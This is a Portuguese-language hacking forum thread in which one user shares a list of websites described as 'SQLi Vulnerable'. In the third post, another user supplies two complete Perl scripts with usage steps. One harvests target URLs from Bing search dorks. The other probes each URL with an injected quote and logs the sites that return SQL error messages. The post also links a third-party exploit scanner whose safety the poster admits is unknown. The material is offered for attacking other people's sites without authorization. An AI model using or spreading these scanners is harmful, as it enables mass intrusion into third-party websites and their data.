Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Novos sites Vull SQLi

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Novos sites Vull SQLi

    Novos sites vulls.

    Aproveitem.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' : SQLi Vulnerable
    WhiteCollarGroup till I die
    MI5, MI6,NSA,FBI,Army, CIA,Navy,Air Force, Mossad, PF and all this shit can't stop me.
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Luan Loko
    Diz ai... Qual app vc usa pra passar o scan no google pra achar os vul?
    • Top

    Comment

    • Font Size
      #3
      Postado Originalmente por Hunt3rBR Ver Post
      Luan Loko
      Diz ai... Qual app vc usa pra passar o scan no google pra achar os vul?
      Ele usa o XCode Exploit scanner

      Donwload: -> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

      PS: Eu tinha no pc,năo foi eu que upei entăo năo se é virus ou năo,mas aque no forum do GH tem ele pra donwload,caso queira procurar o nome dele que ja disse anteriormente é Xcode exploit scanner.Caso vocę prefira 1 exploit em perl:

      Para pegar vulneravel:

      Código:
      #!/usr/bin/perl 
#Coded: Scr1PT
 use LWP::UserAgent; 
system("cls");
print "Bing Scan\n";
print "Coded by: Scr1PT.N3T\n";
print "Digite uma Dork. Ex: noticias.php?id=100\n" ;
print ">";
 $dork = <STDIN>; 
 chomp($dork); 
 for ($i = 0; $i < 1000; $i += 10) { 
 $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)'); 
 $b->timeout(30); 
 $b->env_proxy; 
 $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content; 
 $check = index($c, 'sb_pagN'); 
 while (1) { 
 $n = index($c, '<h3><a href="'); 
 if ($n == -1) { 
 last; 
 } 
 $c = substr($c, $n + 13); 
 $s = substr($c, 0, index($c, '"'));
 open (txt,">>lista.txt"); 
 print txt  $s,"\n"; 
 close(txt);
 } 
 if ($check == -1) { 
 last; 
 } 
 }
 system("lista.txt");
 exit;
      ---
      Para testar quais estăo vulneravel a SQL:
      Código:
      #!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");

if (!$ARGV[0]) {

$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");

my @bannerzinho = (0,100..200);
my $variavelbanner = $bannerzinho[int rand @bannerzinho];

if ($variavelbanner % 2 == 0) {

&bannerUm();
exit;

}
else {
&bannerDois();
exit;
}
}

&bannerDois();

print q {
[+] Scaneando WebSite...

};

open( SITE, "< $ARGV[0]" ) or die( "Nao foi possível abrir o arquivo: $!" );

our @array = <SITE>;

$numero = $#array;

for ($i = 0; $i <= $numero; $i++) {

$Dominio = "$array[$i]";

if($Dominio !~ /http:\/\//) { $Dominio = "http://$Dominio"; }


$cmd = "'";

$site = "$Dominio$cmd";

my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $resposta=$ua->request($req);

if($resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/) {

print "\n \t $Dominio \n";

open (NOTEPAD, ">> SqlInjection.txt");
print NOTEPAD "$site\n";
close(NOTEPAD);

}
}

print q {

[+] FIM !
};


sub bannerUm {

print q {



_______________________
< Hello !! Welcome !! >
-----------------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_| Scanner v 1.0

[*] Modo de uso: perl ScannerSQL.pl lista.txt

[+] Scanner criado por: Inj3cti0n P4ck3t

};


}

sub bannerDois {

print q {
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| Scanner v 1.0

[*] Modo de uso: perl ScannerSQL.pl lista.txt

[+] Scanner criado por: Inj3cti0n P4ck3t


};

}
      Para usar é simples,primeiro vocę roda o primeiro scan(oque procura os sites),apos isso ele ira criar uma lista de sites que ele procurou(a lista ficara no diretorio onde ele está),com o nome lista.txt,apos isso vocę roda o segundo scan(para testar as vulnerabilidades),para usar ele é o seguinte :
      Código:
      perl test.pl <nome da lista de sites>
      ; Exemplo:
      Código:
      perl test.pl lista.txt
      Lembrando que para rodar o segundo scan é preciso que a lista sites esteja no seu diretorio.Eu tambem tenho algums scans de IRC caso vocę queira.
      leia O político honesto năo pode ser encontrado

      O político que vocę estava procurando năo pode ser encontrado ou năo existe!
      É uma lenda, trocou de nome ou está eternamente fora do ar.

      Por favor tente o seguinte:

      Verifique se vocę está mesmo votando na pessoa certa.
      Aguarde algumas décadas para uma renovaçăo.
      Năo adianta clicar no botăo Voltar e tentar outro.

      HTTP Error 404 - Político honesto năo encontrado.
      Internet Information Services (IIS)
      • Top

      Comment

      • Font Size
        #4
        Kzs, Valeu!
        • Top

        Comment

        Anterior template Avançar
        X
        Working...
        X